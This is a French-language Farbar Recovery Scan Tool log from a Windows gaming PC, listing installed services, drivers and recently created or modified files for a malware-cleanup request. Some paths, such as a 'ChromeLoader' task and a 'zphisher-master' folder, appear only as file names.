[2021-10-19] CHR Extension: (Gmail) - C:\Users\Shadow\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-10-19] CHR Extension: (Options) - C:\Users\Shadow\AppData\Local [2022-01-09] CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb] CHR HKLM-x32\...\Chrome\Extension: [mfhcmdonhekjhfbjmeacdjbhlfgpjabp] Opera: ======= StartMenuInternet: (HKU\S-1-5-21-562984153-1162597116-1858956116-1001) Opera GXStable - "C:\Users\Shadow\AppData\Local\Programs\Opera GX\Launcher.exe" ==================== Services (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8912272 2021-11-29] (BattlEye Innovations e.K. -> ) S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [784512 2021-12-03] (EasyAntiCheat Oy -> EasyAntiCheat Ltd) S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029472 2021-11-01] (Epic Games Inc. -> Epic Games, Inc.) R2 NVWMI; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_0bc9105c62ca22fb\NVWMI\nvWmi64.exe [4465592 2021-12-15] (Nvidia Corporation -> NVIDIA Corporation) S3 OverwolfUpdater; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2484056 2021-12-15] (Overwolf Ltd -> Overwolf LTD) S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [2017072 2021-11-29] (Rockstar Games, Inc. -> Rockstar Games) R2 ShadowManager; C:\Program Files\Blade Group\ShadowManager\ShadowManager.exe [379816 2021-04-20] (Blade -> ) R2 ShadowOperator; C:\Program Files\Blade Group\ShadowOperator\ShadowOperator.exe [129448 2021-04-22] (Blade -> ) R2 ShadowProcessator; C:\Program Files\Blade Group\ShadowProcessator\ShadowProcessator.exe [6651312 2021-05-04] (Blade -> Blade) R2 ShadowSerial; C:\Program Files\Blade SAS\ShadowSerial\ShadowSerial.exe [363496 2019-09-17] (Blade -> ) [Fichier non signé] R2 ShadowServicesWatcher; C:\Program Files\Blade Group\ShadowServicesWatcher\ShadowServicesWatcher.exe [52664 2021-04-26] (Blade -> ) R2 ShadowStreamer; C:\Program Files\Blade Group\ShadowStreamer\ShadowStreamer.exe [5336368 2021-06-07] (Blade -> Blade Group) R2 ShadowSystemWatcher; C:\Program Files\Blade Group\ShadowSystemWatcher\ShadowSystemWatcher.exe [72120 2021-04-26] (Blade -> ) R2 ShadowUsbOverIp; C:\Program Files\Blade Group\ShadowUsbOverIp\ShadowUsbOverIp.exe [65024 2020-02-27] (Blade Group) [Fichier non signé] S3 tvnserver; C:\Program Files\TightVNC\tvnserver.exe [1805936 2019-10-15] (GlavSoft LLC -> GlavSoft LLC.) R2 UsbService; C:\Program Files\Blade Group\ShadowUsbOverIp\UsbService64.exe [4266176 2020-02-27] (Element 5 Limited Liability Company -> ELTIMA Software) S3 VBoxSDS; C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe [746688 2021-04-28] (Oracle Corporation -> Oracle Corporation) R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe [2876152 2021-12-15] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe [128360 2021-12-15] (Microsoft Windows Publisher -> Microsoft Corporation) R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_0bc9105c62ca22fb\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_0bc9105c62ca22fb\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem ===================== Pilotes (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R3 BEDaisy; C:\Program Files (x86)\Common Files\BattlEye\BEDaisy.sys [3383944 2022-01-09] (BattlEye Innovations e.K. -> ) R3 BladeSysVirtHID; C:\Windows\System32\drivers\BladeSysVirtHID.sys [22040 2020-03-06] (Blade -> Windows (R) Win 7 DDK provider) S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Fichier non signé] S3 BthHFEnum; C:\Windows\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [Fichier non signé] R3 ELTIMA_USB_HUB_FILTER; C:\Windows\System32\drivers\fusbhub.sys [130744 2020-02-27] (Element 5 Limited Liability Company -> ELTIMA Software) R3 eustub; C:\Windows\System32\drivers\eusbstub.sys [39608 2020-02-27] (Element 5 Limited Liability Company -> ELTIMA Software) R3 FwCfg; C:\Windows\System32\drivers\fwcfg.sys [31200 2020-11-20] (Blade SAS -> Red Hat, Inc.) R3 netkvm; C:\Windows\System32\drivers\netkvm.sys [143048 2019-04-12] (Red Hat, Inc. -> Red Hat, Inc.) R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [48552 2021-11-01] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation) R2 ShadowVirtualStorage; C:\Windows\System32\DRIVERS\ShadowVirtualStorage.sys [78936 2021-03-15] (Blade SAS -> Windows (R) Win 7 DDK provider) R3 sysvad_bladeaudio; C:\Windows\System32\drivers\BladeAudio.sys [95200 2020-12-24] (Blade SAS -> Windows (R) Win 7 DDK provider) S3 UniFairy_x64; C:\Windows\system32\drivers\UniFairy_x64.sys [4777952 2021-10-18] (Tencent Technology(Shenzhen) Company Limited -> TENCENT) S3 unirsdt; C:\Windows\system32\drivers\unirsdt.sys [3314472 2021-10-18] (Tencent Technology(Shenzhen) Company Limited -> TENCENT) S3 VBAudioVMVAIOMME; C:\Windows\System32\drivers\vbaudio_vmvaio64_win10.sys [71712 2021-10-19] (Vincent Burel -> Windows (R) Win 7 DDK provider) R3 VBoxNetAdp; C:\Windows\system32\DRIVERS\VBoxNetAdp6.sys [239616 2021-04-28] (Oracle Corporation -> Oracle Corporation) R1 VBoxNetLwf; C:\Windows\system32\DRIVERS\VBoxNetLwf.sys [249536 2021-04-28] (Oracle Corporation -> Oracle Corporation) R3 ViGEmBus; C:\Windows\System32\drivers\ViGEmBus.sys [70104 2020-03-06] (Blade -> Benjamin Höglinger-Stelzer) R0 vioscsi; C:\Windows\System32\drivers\vioscsi.sys [63688 2019-04-12] (Red Hat, Inc. -> Red Hat, Inc.) R3 VirtioSerial; C:\Windows\System32\drivers\vioser.sys [74952 2019-04-12] (Red Hat, Inc. -> Red Hat, Inc.) R3 vjoy; C:\Windows\System32\drivers\vjoy.sys [67448 2019-07-14] (On-site Dental Systems (Justin Shafer) -> Shaul Eizikovich) S3 VOICEMOD_Driver; C:\Windows\system32\drivers\vmdrv.sys [45408 2018-01-10] (Voicemod Sociedad Limitada -> Windows (R) Win 7 DDK provider) R3 vuhub; C:\Windows\System32\drivers\vuhub.sys [145080 2020-02-27] (Element 5 Limited Liability Company -> ELTIMA Software) S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [48536 2021-12-15] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [435432 2021-12-15] (Microsoft Windows -> Microsoft Corporation) R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [86248 2021-12-15] (Microsoft Windows -> Microsoft Corporation) R3 WinRing0_1_2_0; C:\Program Files\Blade Group\ShadowSystemWatcher\OpenHardwareMonitorLib.sys [14544 2022-01-09] (Noriyuki MIYAZAKI -> OpenLibSys.org) S3 xhunter1; C:\Windows\xhunter1.sys [2719256 2021-11-12] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.) S3 VBAudioVMAUXVAIOMME; \SystemRoot\System32\drivers\vbaudio_vmauxvaio64_win10.sys [X] ==================== NetSvcs (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ==================== Un mois (créés) (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2022-01-09 18:35 - 2022-01-09 18:36 - 000031666 _____ C:\Users\Shadow\Downloads\FRST.txt 2022-01-08 23:05 - 2022-01-08 23:05 - 000004246 _____ C:\Windows\system32\Tasks\Opera GX scheduled Autoupdate 1641679505 2022-01-08 23:05 - 2022-01-08 23:05 - 000001431 _____ C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Navigateur Opera GX.lnk 2022-01-08 23:05 - 2022-01-08 23:05 - 000000000 ____D C:\Users\Shadow\AppData\Local\Opera Software 2022-01-08 23:04 - 2022-01-08 23:04 - 003357424 _____ (Opera Software) C:\Users\Shadow\Downloads\OperaGXSetup.exe 2022-01-08 23:04 - 2022-01-08 23:04 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Opera Software 2022-01-08 16:41 - 2022-01-08 16:41 - 000000008 __RSH C:\ProgramData\ntuser.pol 2022-01-08 16:39 - 2022-01-08 16:40 - 000002025 _____ C:\Users\Shadow\Downloads\Fixlog.txt 2022-01-08 15:58 - 2022-01-09 18:36 - 000000000 ____D C:\FRST 2022-01-08 15:57 - 2022-01-08 15:57 - 002311168 _____ (Farbar) C:\Users\Shadow\Downloads\FRST64.exe 2022-01-07 22:29 - 2022-01-07 22:29 - 000000221 _____ C:\Users\Shadow\Desktop\The Elder Scrolls V Skyrim.url 2022-01-07 22:03 - 2022-01-07 22:03 - 000000000 ____D C:\Users\Shadow\AppData\Local\chrome 2022-01-07 22:02 - 2022-01-07 22:02 - 000012828 _____ C:\Windows\system32\Tasks\ChromeLoader 2022-01-07 21:49 - 2022-01-07 21:49 - 002326679 _____ C:\Users\Shadow\Downloads\MODSKIN_12.1.1.zip 2022-01-07 21:49 - 2022-01-07 21:49 - 000000000 ____D C:\Users\Shadow\Downloads\MODSKIN_12.1.1 2022-01-02 00:31 - 2021-12-31 05:37 - 000000000 ____D C:\Users\Shadow\Desktop\zphisher-master 2022-01-02 00:27 - 2022-01-02 00:27 - 000000000 ____D C:\Users\Shadow\VirtualBox VMs 2022-01-02 00:26 - 2022-01-02 00:30 - 000000000 ____D C:\Users\Shadow\.VirtualBox 2022-01-02 00:26 - 2022-01-02 00:26 - 000000000 ____D C:\ProgramData\VirtualBox 2022-01-02 00:25 - 2022-01-02 00:25 - 000001149 _____ C:\Users\Public\Desktop\Oracle VM VirtualBox.lnk 2022-01-02 00:25 - 2022-01-02 00:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Oracle VM VirtualBox 2022-01-02 00:25 - 2022-01-02 00:25 - 000000000 ____D C:\Program Files\Oracle 2022-01-02 00:25 - 2021-04-28 14:27 - 000187648 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxUSBMon.sys 2022-01-02 00:25 - 2021-04-28 14:26 - 001038080 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxDrv.sys 2022-01-02 00:24 - 2022-01-02 00:25 - 012390015 _____ C:\Users\Shadow\Downloads\zphisher-master.zip 2022-01-02 00:24 - 2022-01-02 00:24 - 108114104 _____ (Oracle Corporation) C:\Users\Shadow\Downloads\VirtualBox-6.1.22-144080-Win.exe 2021-12-30 23:35 - 2021-12-30 23:35 - 002325915 _____ C:\Users\Shadow\Downloads\MODSKIN_11.24.2 (1).zip 2021-12-30 23:35 - 2021-12-30 23:35 - 000000000 ____D C:\Users\Shadow\Downloads\MODSKIN_11.24.2 (1) 2021-12-30 01:27 - 2021-12-30 01:27 - 000001475 _____ C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\NVIDIA GeForce NOW.lnk 2021-12-30 01:27 - 2021-12-30 01:27 - 000001467 _____ C:\Users\Shadow\Desktop\NVIDIA GeForce NOW.lnk 2021-12-30 01:26 - 2021-12-30 01:26 - 142974048 _____ (NVIDIA Corporation) C:\Users\Shadow\Downloads\GeForceNOW-release.exe 2021-12-29 01:27 - 2021-12-29 01:27 - 000000205 _____ C:\Users\Shadow\Desktop\Tom Clancy's Rainbow Six Siege.url 2021-12-29 01:27 - 2021-12-29 01:27 - 000000205 _____ C:\Users\Shadow\Desktop\Tom Clancy's Rainbow Six Siege - Vulkan.url 2021-12-27 19:58 - 2021-12-27 19:59 - 150068896 _____ C:\Users\Shadow\Downloads\ace3_3.14.1.zip 2021-12-27 19:51 - 2021-12-27 19:51 - 000000000 ____D C:\Users\Shadow\Desktop\backup steam 2021-12-27 19:41 - 2021-12-27 19:41 - 000967553 _____ C:\Users\Shadow\Downloads\DLC unlocker.rar 2021-12-27 02:30 - 2021-12-27 02:30 - 000000000 ____D C:\R6S 2021-12-27 02:20 - 2019-06-20 11:55 - 007694208 _____ C:\Users\Shadow\Desktop\task_force_radio.ts3_plugin 2021-12-27 00:26 - 2021-12-27 00:26 - 000038053 _____ C:\Users\Shadow\Downloads\Arma_3_Preset_XarK_Entrainement_V11.html 2021-12-27 00:14 - 2021-12-27 00:14 - 131443212 _____ C:\Users\Shadow\Downloads\0.9.12.zip 2021-12-25 23:35 - 2021-12-27 03:40 - 000000000 ____D C:\Users\Shadow\Documents\Arma 3 - Other Profiles 2021-12-25 22:10 - 2021-12-25 22:10 - 000000256 _____ C:\Windows\system32\edid.bin 2021-12-25 01:32 - 2021-12-25 01:32 - 000000000 ____D C:\Users\Shadow\Documents\FeedbackHub 2021-12-25 01:32 - 2021-12-25 01:32 - 000000000 ____D C:\Users\Shadow\AppData\Local\ElevatedDiagnostics 2021-12-24 23:29 - 2022-01-07 22:49 - 000000000 ____D C:\Users\Shadow\AppData\Local\Skyrim 2021-12-24 20:54 - 2022-01-08 23:55 - 000000000 ____D C:\Users\Shadow\AppData\Local\Arma 3 2021-12-24 20:54 - 2021-12-24 20:55 - 000000000 ____D C:\Users\Shadow\Documents\Arma 3 2021-12-24 20:54 - 2021-12-24 20:54 - 000000000 ____D C:\ProgramData\Bohemia Interactive 2021-12-24 20:53 - 2022-01-09 01:35 - 000000000 ____D C:\Users\Shadow\AppData\Local\Arma 3 Launcher 2021-12-24 20:41 - 2021-12-24 20:41 - 000000222 _____ C:\Users\Shadow\Desktop\Arma 3.url 2021-12-24 18:32 - 2021-12-24 20:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\vJoy 2021-12-24 18:32 - 2021-12-24 20:36 - 000000000 ____D C:\Program Files\vJoy 2021-12-24 18:32 - 2021-12-24 18:32 - 011482272 _____ (Shaul Eizikovich ) C:\Users\Shadow\Downloads\vJoySetup.exe 2021-12-24 18:32 - 2021-12-24 18:32 - 005484523 _____ C:\Users\Shadow\Downloads\mouse2joystick_custom_CEMU.zip 2021-12-24 18:32 - 2019-07-14 11:06 - 000067448 _____ (Shaul Eizikovich) C:\Windows\system32\Drivers\vjoy.sys 2021-12-24 18:32 - 2019-07-14 11:06 - 000026808 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\hidkmdf.sys 2021-12-24 18:29 - 2021-12-24 18:29 - 024871566 _____ C:\Users\Shadow\Downloads\cemu_1.26.0.zip 2021-12-24 18:19 - 2021-12-24 18:19 - 000000000 ____D C:\Users\Shadow\AppData\Local\Cemu 2021-12-24 17:37 - 2021-12-24 18:16 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\USB_HELPER 2021-12-24 17:37 - 2021-12-24 17:37 - 000001087 _____ C:\Users\Shadow\Desktop\Wii U USB Helper.lnk 2021-12-24 17:37 - 2021-12-24 17:37 - 000001073 _____ C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wii U USB Helper.lnk 2021-12-24 17:37 - 2021-12-24 17:37 - 000000000 ____D C:\Users\Shadow\AppData\Local\Hikari06 2021-12-24 17:35 - 2021-12-24 17:37 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\USBHelperLauncher 2021-12-24 17:34 - 2021-12-24 17:34 - 000289190 _____ C:\Users\Shadow\Downloads\USBHelperInstaller.exe 2021-12-24 17:30 - 2021-12-24 17:38 - 940358128 _____ C:\Users\Shadow\Downloads\The.Legend.of.Zelda.Breath.of.the.Wild.v1.5.inclu.DLC.part2.rar 2021-12-24 17:30 - 2021-12-24 17:34 - 1063004405 _____ C:\Users\Shadow\Downloads\The.Legend.of.Zelda.Breath.of.the.Wild.v1.5.inclu.DLC.part1.rar 2021-12-24 17:09 - 2021-12-15 21:58 - 001450200 _____ C:\Windows\SysWOW64\vulkaninfo-1-999-0-0-0.exe 2021-12-24 17:09 - 2021-12-15 21:58 - 001450200 _____ C:\Windows\SysWOW64\vulkaninfo.exe 2021-12-24 17:09 - 2021-12-15 21:57 - 001874648 _____ C:\Windows\system32\vulkaninfo-1-999-0-0-0.exe 2021-12-24 17:09 - 2021-12-15 21:57 - 001874648 _____ C:\Windows\system32\vulkaninfo.exe 2021-12-24 17:09 - 2021-12-15 21:57 - 001466024 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll 2021-12-24 17:09 - 2021-12-15 21:57 - 001209312 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll 2021-12-24 17:09 - 2021-12-15 21:57 - 001112336 _____ C:\Windows\system32\vulkan-1-999-0-0-0.dll 2021-12-24 17:09 - 2021-12-15 21:57 - 000966416 _____ C:\Windows\SysWOW64\vulkan-1-999-0-0-0.dll 2021-12-24 17:09 - 2021-12-15 21:57 - 000966416 _____ C:\Windows\SysWOW64\vulkan-1.dll 2021-12-24 17:09 - 2021-12-15 21:54 - 001524392 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll 2021-12-24 17:09 - 2021-12-15 21:54 - 000802216 _____ C:\Windows\system32\nvofapi64.dll 2021-12-24 17:09 - 2021-12-15 21:54 - 000679384 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll 2021-12-24 17:09 - 2021-12-15 21:54 - 000636840 _____ C:\Windows\SysWOW64\nvofapi.dll 2021-12-24 17:09 - 2021-12-15 21:54 - 000565416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll 2021-12-24 17:09 - 2021-12-15 21:53 - 002116520 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll 2021-12-24 17:09 - 2021-12-15 21:53 - 001597552 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll 2021-12-24 17:09 - 2021-12-15 21:53 - 001175512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll 2021-12-24 17:09 - 2021-12-15 21:53 - 000708776 _____ (NVIDIA Corporation) C:\Windows\system32\nvidia-smi.exe 2021-12-24 17:09 - 2021-12-15 21:52 - 008725160 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll 2021-12-24 17:09 - 2021-12-15 21:52 - 007843968 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll 2021-12-24 17:09 - 2021-12-15 21:52 - 005732320 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll 2021-12-24 17:09 - 2021-12-15 21:52 - 004938880 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll 2021-12-24 17:09 - 2021-12-15 21:52 - 002852280 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll 2021-12-24 17:09 - 2021-12-15 21:52 - 000452224 _____ (NVIDIA Corporation) C:\Windows\system32\nvdebugdump.exe 2021-12-24 17:09 - 2021-12-15 21:51 - 000851936 _____ (NVIDIA Corporation) C:\Windows\system32\MCU.exe 2021-12-24 17:09 - 2021-12-15 21:50 - 006438112 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll 2021-12-24 17:09 - 2021-12-15 13:16 - 000085698 _____ C:\Windows\system32\nvinfo.pb 2021-12-20 21:41 - 2022-01-09 18:23 - 000002319 _____ C:\Users\Shadow\Desktop\R6 Tracker.lnk 2021-12-19 00:40 - 2021-12-25 22:07 - 000000000 ____D C:\Windows\system32\Tasks\NCH Software 2021-12-19 00:40 - 2021-12-19 00:40 - 001473024 _____ (NCH Software) C:\Users\Shadow\Downloads\VoxalModificateurVocal_FR.exe 2021-12-19 00:40 - 2021-12-19 00:40 - 000055976 _____ C:\Windows\system32\Drivers\voxaldriverx64.sys 2021-12-19 00:40 - 2021-12-19 00:40 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\NCH Software 2021-12-18 19:18 - 2021-12-18 19:18 - 000000204 _____ C:\Users\Shadow\Desktop\Rayman Origins.url 2021-12-18 00:36 - 2021-12-18 00:36 - 000000000 ____D C:\Windows\SystemTemp 2021-12-18 00:26 - 2021-12-18 00:26 - 000223744 _____ C:\Windows\SysWOW64\TpmTool.exe 2021-12-18 00:26 - 2021-12-18 00:26 - 000011979 _____ C:\Windows\system32\DrtmAuthTxt.wim 2021-12-18 00:25 - 2021-12-18 00:25 - 000272384 _____ C:\Windows\system32\TpmTool.exe 2021-12-18 00:25 - 2021-12-18 00:25 - 000162816 _____ C:\Windows\system32\DataStoreCacheDumpTool.exe 2021-12-18 00:01 - 2021-12-18 00:01 - 000000000 ___HD C:\$WinREAgent 2021-12-17 00:11 - 2021-12-17 00:11 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Applications Chrome 2021-12-16 22:46 - 2021-12-16 22:46 - 000002186 _____ C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DeepL.lnk 2021-12-16 22:46 - 2021-12-16 22:46 - 000000000 ____D C:\Users\Shadow\AppData\Local\Sentry 2021-12-16 22:46 - 2021-12-16 22:46 - 000000000 ____D C:\Users\Shadow\AppData\Local\DeepL_GmbH 2021-12-16 22:45 - 2021-12-16 22:46 - 000000000 ____D C:\Users\Shadow\AppData\Local\DeepL 2021-12-16 22:45 - 2021-12-16 22:45 - 122954800 _____ (DeepL GmbH) C:\Users\Shadow\Downloads\DeepLSetup.exe 2021-12-15 18:12 - 2021-12-15 18:12 - 000000000 ____D C:\Users\Shadow\Downloads\MODSKIN_11.24.2 2021-12-15 18:11 - 2021-12-15 18:11 - 002325915 _____ C:\Users\Shadow\Downloads\MODSKIN_11.24.2.zip 2021-12-12 01:32 - 2021-12-12 01:36 - 000000000 ____D C:\Users\Shadow\Downloads\Bataille navale 2021-12-12 01:31 - 2021-12-12 01:31 - 000007019 _____ C:\Users\Shadow\Downloads\bataille navale.zip 2021-12-10 16:29 - 2021-12-10 16:29 - 000000000 ____D C:\Users\Shadow\Jedi 2021-12-10 16:29 - 2021-12-10 16:29 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\jupyter 2021-12-10 16:29 - 2021-12-10 16:29 - 000000000 ____D C:\Users\Shadow\AppData\Local\Spyder 2021-12-10 16:29 - 2021-12-10 16:29 - 000000000 ____D C:\Users\Shadow\.matplotlib 2021-12-10 16:29 - 2021-12-10 16:29 - 000000000 ____D C:\Users\Shadow\.ipython 2021-12-10 16:28 - 2021-12-10 16:30 - 000000000 ____D C:\Users\Shadow\.spyder-py3 2021-12-10 16:26 - 2021-12-10 16:26 - 000002414 _____ C:\Users\Shadow\Desktop\Spyder.lnk 2021-12-10 16:23 - 2021-12-10 16:23 - 194199319 _____ C:\Users\Shadow\Downloads\Spyder_64bit_full.exe 2021-12-10 15:07 - 2021-12-10 15:07 - 000000000 ____D C:\Users\Shadow\Downloads\MODSKIN_11.24.1 2021-12-10 15:06 - 2021-12-10 15:07 - 002325703 _____ C:\Users\Shadow\Downloads\MODSKIN_11.24.1.zip ==================== Un mois (modifiés) ================== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2022-01-09 18:38 - 2021-10-18 20:09 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\discord 2022-01-09 18:37 - 2021-10-18 21:13 - 000000000 ____D C:\Program Files (x86)\Steam 2022-01-09 18:37 - 2021-10-18 19:07 - 000000000 ____D C:\ProgramData\TEMP 2022-01-09 18:33 - 2020-07-28 15:20 - 000003344 _____ C:\Windows\system32\Tasks\Paranoid-SafetyNet 2022-01-09 18:31 - 2021-10-19 11:11 - 000000000 ____D C:\Program Files (x86)\Google 2022-01-09 18:31 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2022-01-09 18:30 - 2020-07-28 11:40 - 000000000 ____D C:\ProgramData\NVIDIA 2022-01-09 18:28 - 2020-07-28 11:57 - 000791762 _____ C:\Windows\system32\perfh00C.dat 2022-01-09 18:28 - 2020-07-28 11:57 - 000149928 _____ C:\Windows\system32\perfc00C.dat 2022-01-09 18:28 - 2020-07-28 11:00 - 001770910 _____ C:\Windows\system32\PerfStringBackup.INI 2022-01-09 18:28 - 2019-12-07 10:13 - 000000000 ____D C:\Windows\INF 2022-01-09 18:24 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps 2022-01-09 18:24 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\AppReadiness 2022-01-09 18:23 - 2021-12-04 18:01 - 000002319 _____ C:\Users\Shadow\Desktop\U.GG.lnk 2022-01-09 18:23 - 2021-11-07 20:19 - 000000000 ____D C:\Users\Shadow\AppData\Local\Overwolf 2022-01-09 18:23 - 2021-10-28 15:44 - 000000000 _____ C:\.svs_control 2022-01-09 18:23 - 2021-10-19 19:29 - 000000000 ____D C:\Users\Shadow\AppData\Local\Ubisoft Game Launcher 2022-01-09 18:23 - 2021-10-19 07:51 - 000000000 ____D C:\Users\Shadow\AppData\Local\Discord 2022-01-09 18:22 - 2020-07-28 09:55 - 000008192 ___SH C:\DumpStack.log.tmp 2022-01-09 18:22 - 2020-07-28 09:55 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2022-01-09 01:42 - 2019-12-07 10:03 - 000524288 _____ C:\Windows\system32\config\BBI 2022-01-09 01:38 - 2021-10-18 20:03 - 000000000 ____D C:\ProgramData\Riot Games 2022-01-09 01:36 - 2021-10-30 23:27 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\TS3Client 2022-01-08 23:07 - 2021-10-18 20:14 - 000000000 ____D C:\Users\Shadow\AppData\Local\D3DSCache 2022-01-08 19:49 - 2020-07-28 09:55 - 000000000 ____D C:\Windows\system32\SleepStudy 2022-01-08 16:52 - 2021-11-13 02:09 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Vortex 2022-01-08 16:50 - 2021-11-13 02:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Black Tree Gaming Ltd 2022-01-08 16:40 - 2021-11-03 15:12 - 000000000 ____D C:\Users\Shadow\AppData\LocalLow\Temp 2022-01-08 16:39 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\GroupPolicy 2022-01-08 15:38 - 2021-10-19 16:12 - 000002442 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2022-01-07 23:41 - 2021-11-07 20:20 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Overwolf 2022-01-07 22:44 - 2021-10-18 21:18 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam 2022-01-07 22:31 - 2021-11-11 20:09 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Leppsoft 2022-01-07 21:49 - 2021-11-12 01:38 - 000000775 _____ C:\Users\Public\Desktop\LOL SKIN.lnk 2022-01-07 21:49 - 2021-11-06 23:45 - 000000000 ____D C:\Fraps 2022-01-07 17:02 - 2021-10-19 11:12 - 000002245 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2022-01-07 17:02 - 2021-10-19 11:12 - 000002204 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2022-01-02 00:35 - 2021-11-19 21:59 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Code 2022-01-02 00:33 - 2021-11-19 21:59 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Visual Studio Code 2022-01-02 00:27 - 2021-10-18 19:12 - 000000000 ____D C:\Users\Shadow 2021-12-30 01:27 - 2021-10-18 23:48 - 000000000 ____D C:\Users\Shadow\AppData\Local\NVIDIA 2021-12-30 01:27 - 2021-10-18 20:01 - 000000000 ____D C:\Users\Shadow\AppData\Local\NVIDIA Corporation 2021-12-30 01:27 - 2020-07-28 11:40 - 000000000 ____D C:\ProgramData\NVIDIA Corporation 2021-12-30 00:36 - 2019-12-07 10:03 - 000000000 ____D C:\Windows\CbsTemp 2021-12-28 05:00 - 2021-10-25 17:13 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\obs-studio 2021-12-28 00:54 - 2021-10-18 21:48 - 000000000 ____D C:\Users\Shadow\AppData\Local\CrashDumps 2021-12-27 17:59 - 2021-10-23 17:49 - 000040960 _____ C:\ShadowProcessator2.sqlite 2021-12-27 02:29 - 2021-10-22 19:30 - 000000000 ____D C:\Program Files (x86)\Rockstar Games 2021-12-26 22:52 - 2021-10-27 18:55 - 000000000 ____D C:\Users\Shadow\AppData\Local\FiveM 